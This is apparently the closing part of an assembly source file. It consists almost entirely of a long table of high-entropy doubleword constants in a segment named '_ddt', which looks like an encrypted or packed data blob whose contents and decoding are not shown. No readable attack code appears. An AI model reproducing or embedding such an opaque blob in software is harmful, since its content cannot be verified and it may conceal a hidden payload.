dd 0A75BCB61h, 1E818F3Ch, 60CDF9F7h, 0AC2DB5C7h, 0FFB5D43Ah
dd 37B01E8Bh, 0A1CD5BAFh
dd 0E5788316h, 1EA4335Fh, 40D37A8Ah, 0F018AB35h, 0E79D46Ah
dd 0D917DC7h, 952353B8h, 8370FF05h, 0D9927FBh, 0B1C457FAh
dd 80709F2Bh, 12B9CB51h, 59E87487h, 0F817ABCFh, 6B1FB725h
dd 55BD4BF0h, 9C0EA6E5h, 9026C32Fh, 4903E4Ah, 0B0DB62FFh
dd 0FA0B9722h, 28B5C06Eh, 54E80C99h, 0B21DB2C7h, 0A93A831Bh
dd 79870FDCh, 0E72C5BE9h, 0D17D8B5Fh, 1AA13E43h, 2CD4638Fh
dd 0F600A839h, 224FDA67h, 64F9069Ah, 0C67CECAFh, 0F400A954h
dd 406E4A8Dh, 0BBC051D3h, 843B71Fh, 2591FE6Ch, 40EC32C4h
dd 8D1EA632h, 3944D278h, 66F018A9h, 973F4AD7h, 0DC6DF703h
dd 6DFD107Fh, 0A9A20B98h, 0E50F9B25h, 2DF1854Eh, 5FE5739Fh
dd 8511B9CAh, 365F8E76h, 7C8914A2h, 0A93545EDh, 8A118E1Fh
dd 57F2641Eh, 7AEC56A2h, 0C835A5DFh, 25F99D5Ah, 55FF0B97h
dd 9D29B6C3h, 0C95DEA0Eh, 7D882FB8h, 0A3C85AEEh, 844BB614h
dd 7BC0513Ah, 46D07C96h, 0B85EB732h, 3E48D662h, 68F502AAh
dd 9C454FDAh, 0C16EFB0Fh, 0C902FBAh, 0C8C251FAh, 0BB2FC775h
dd 2A8D9B00h, 6CD985E3h, 0B811A4C7h, 3A1D84Eh, 23BC2A97h
dd 0AD39479Bh, 0DC64F21Ah, 0C903F4Bh, 0B8DE6BFFh, 0F80F9723h
dd 18B1CB6Dh, 378466A9h, 8230D9A2h, 0D15CE472h, 78845AFCh
dd 0A5315BEAh, 0D17C8A13h, 1DA13E27h, 49D56A8Ch, 0FD03AA3Dh
dd 7913AA63h, 3DAE59CDh, 781387EFh, 0F561CE3Ch, 709C62F4h
dd 0BFCD56E2h, 0E974822Dh, 16A5CF5Dh, 45EC7883h, 0BC11AF33h
dd 5C3ABA4Dh, 66EC7DCEh, 8D3848D6h, 0DC68BE40h, 0B91224Eh
dd 0B5C06EF9h, 0E40C9C43h, 2DBBC251h, 50EC729Ah, 0DA48E0BBh
dd 0CBD28h, 4C7A7699h, 0AC3646DFh, 3457BB2Bh, 319D0A70h
dd 4CD82EB0h, 0FC03923Eh, 25B0DE68h, 52F90B91h, 9928B4C7h
dd 0F854EB0Fh, 10FE4689h, 0A2D03982h, 0F17C8412h, 18A47A1Ch
dd 40D77E8Ah, 0F11CAA34h, 3848D007h, 69F706ADh, 95284EDEh
dd 9E34A477h, 3CC871ECh, 8F2564CAh, 0A740AE1Bh, 11BDCB1Fh
dd 5AE17483h, 8A14A3CFh, 3443EF7Dh, 608F18A7h, 9C3844D3h
dd 0BB009A2Dh, 68C5D2Eh, 0ADD868F6h, 0FC08DE60h, 20B7C26Eh
dd 55E00E9Dh, 812BB8A3h, 0CE59E671h, 7A8512BDh, 0FD6F2EEAh
dd 812AD549h, 0EFC90C73h, 41D252BFh, 0C2349E3Ch, 107DED87h
dd 6DB145A2h, 9F25B3DFh, 0C551F902h, 719B28B6h, 0BEC956E1h
dd 0EA75822Dh, 7C93FE5Ah, 238819E2h, 8E18A42Eh, 7006CF7Ah
dd 64F01EAAh, 903A43D0h, 0DE0DF702h, 8972349h, 0B4C36CFBh
dd 900C9827h, 73E79F0Dh, 6DD523C8h, 0B4265EFDh, 781EDB47h
dd 7C8816A2h, 0A83140E6h, 0D7638F1Ah, 2AF3840h, 4ED16EF6h
dd 9037A23Ch, 47D4BA14h, 52FC088Ah, 0D46AABC6h, 0C854E20Eh
dd 74852CB2h, 0A2A95BE6h, 0EE7B8110h, 10AD375Dh, 1AA17D89h
dd 0A742F46Eh, 5C73E632h, 6EC5325Ch, 0A1114FD9h, 0F05A1A31h
dd 44DA1783h, 0B9C452FEh, 0E4709B2Bh, 13BFCB56h, 5EEB7484h
dd 8A1DAACAh, 5C73DE78h, 3E87ED8h, 0AE3844CEh, 9026EF1Ah
dd 5903E4Ah, 0B0DC6FF7h, 0FE6D9722h, 2AB7C56Ch, 5CE90B99h
dd 0DE5DB9C5h, 9B06B82Ah, 4EB022EEh, 9401690Bh, 0D135C926h
dd 1AA93743h, 49D5658Ah, 0F705AC3Ah, 2944D863h, 5CF80593h
dd 0FC5ADAEDh, 0C64C9D6Eh, 6D9828B6h, 0BCC81EA0h, 0ED73822Eh
dd 15A0CE5Ch, 43E978E3h, 8510A437h, 4844D17Fh, 3BAF47F5h
dd 0AA0D1B80h, 0EC590563h, 3890214Ch, 832158CEh, 0A33CAA17h
dd 2DB9C71Bh, 58E57599h, 8610BFCBh, 3259E973h, 7F881FAAh
dd 0C00772E9h, 0B704EA64h, 2AC385Ah, 49A7BF6h, 0FE04923Eh
dd 24B1DE6Ch, 52990B96h, 9E2DB5C7h, 0CB54EB06h, 2DDF5EBDh
dd 0F19A05B9h, 0C4FB323h, 29950268h, 44D036C8h, 0F619AA36h
dd 3D48D661h, 6AFC01ADh, 96214FD3h, 0A85FCA03h, 6FFC45D6h
dd 0BAC450E2h, 0AC32832Eh, 10BCCA56h, 5CEB7087h, 8A71A3CEh
dd 3C43E778h, 648F1AA6h, 0F26018A3h, 0E834A540h, 34861E71h
dd 0B4D968C7h, 1C3FA313h, 1985F258h, 54E046D8h, 802FBCC6h
dd 0CD58E670h, 7A8C11BDh, 0A43359E2h, 0B84FBA11h, 7FCC5526h
dd 4AD46092h, 0BC42B33Eh, 264CDA66h, 6CFA0691h, 9A41B3DEh
dd 0CD53F708h, 769D28B0h, 0E2900893h, 0D824D570h, 2341F86Eh
dd 3DC4AB7h, 8D19A77Bh, 3040D17Fh, 67F01FABh, 983943D2h
dd 0DD60F702h, 389D2B4Ch, 0D7A406C9h, 0E210F942h, 31BCC452h
dd 58E43ADCh, 8112BECAh, 315CEA7Fh, 758C15C7h, 0A9344AEBh
dd 0DD628F12h, 59F34A4Fh, 1D8E39ADh, 1833A70Fh, 1581EE5Ch
dd 50FC42D4h, 9B2AB6C2h, 0C954E20Dh, 778026B3h, 0A9C453E6h
dd 0EF788E15h, 7DCD006Fh, 59B21BE8h, 0F51FAB35h, 3D01957Eh
dd 6BF503AFh, 95214CDCh, 0C8659E06h, 59825B2h, 0B0C35BF6h
dd 0BA019D2Ah, 47E2940Eh, 6ADC46D2h, 0B825952Fh, 3409AD4Ah
dd 678C1BA6h, 0A83D41D5h, 0D96CF11Eh, 6CA30E4Eh, 0D3B80E88h
dd 0FE08943Eh, 60F6DF6Ah, 53E06AE2h, 8429BDC1h, 0CD50E572h
dd 21DB62BAh, 0F56601B5h, 304BBF27h, 2D990674h, 49D52ACCh
dd 0F609A63Ah, 224BDE64h, 5CFC029Ah, 0FC5ADAEDh, 0C64C9D6Eh
dd 6D9828B6h, 0D8B01EA0h, 0EB778A27h, 1DA3C85Fh, 1E9D7F83h
dd 0DB46F86Ah, 0E70E22Eh, 54C1294Bh, 907509E6h, 0DF6BF702h
dd 9942046h, 84C86EF8h, 8472F215h, 2EA4A536h, 45E0709Eh
dd 0E068F688h, 3254E975h, 7C8A17A2h, 0F16B32E6h, 8536D145h
dd 0F3CD0077h, 45DD56C3h, 0CE30A238h, 1481E98Bh, 50B549A6h
dd 9F2BB7C2h, 0C954E006h, 44882EBFh, 0C4B232D5h, 0EE64E576h
dd 5A0305Eh, 20A836C8h, 0F214A935h, 3C4DD762h, 31AB72A6h
dd 0C5761185h, 205BCF37h, 3DA91684h, 0B9C51ABCh, 0ED729C2Ah
dd 12BFC255h, 6ED9778Ah, 0ED71DDA7h, 3543F318h, 23901FA5h
dd 0AE5D3F9Bh, 0D067FB1Ch, 5983C49h, 0EE843487h, 0CC58C17Ch
dd 1F55F45Ah, 17D03EABh, 812CBA8Fh, 0CE50E571h, 7F8D12BFh
dd 0CC036EE9h, 0B318EE68h, 1EA8345Eh, 967F8Ah, 0F703CA42h
dd 204DD86Eh, 1CFB019Bh, 0C77BEB81h, 0FE61AF5Ch, 40ADD9D7h
dd 8CF95FEBh, 0DF95B41Ah, 5790FE6Bh, 41EC7ACFh, 8E10A531h
dd 3A40D076h, 0CC32EACh, 0F3582EA8h, 0DE68F41Eh, 40D63F4Ah
dd 0B7C30A82h, 0E204982Eh, 5CBEC456h, 7BB2BC1h, 0B121EF9Ch
dd 6A0A41h, 34CA2793h, 0AA3443EFh, 0DD638718h, 3AB3347h
dd 33B154C3h, 0E566F75Bh, 21B3DF69h, 29B5498Ah, 952AB4A7h
dd 0C155EB0Dh, 2AF12DBDh, 0F79204BEh, 0DA4CB642h, 289505BFh
dd 44993DBAh, 0F31FAB36h, 394CDF6Ah, 58F103ADh, 0F05E26E9h
dd 0C2709962h, 119C24B2h, 0DCBC1ABCh, 0ED789D29h, 11BFCF52h
dd 5B70687h, 0D942FD91h, 0C721D44Bh, 66852A97h, 9A0C76D6h
dd 0E855C5FFh, 3371087Eh, 0D0E75AC7h, 0FA39A6D0h, 1D85CB67h
dd 64D6EEADh, 601B8FF7h, 0F669D644h, 48B5E1DFh, 94305EE8h
dd 0E79DBC22h, 2A9C0673h, 78E5556Fh, 0C4F2CE01h, 2744DB57h
dd 8CCF33A3h, 0AD1582E8h, 0F4661E3Dh, 90AB1F87h, 86F966D4h
dd 0D845714Fh, 24A6CF5Fh, 770D4CB2h, 0B52C9603h, 17h dup(0)
_ddt ends
end start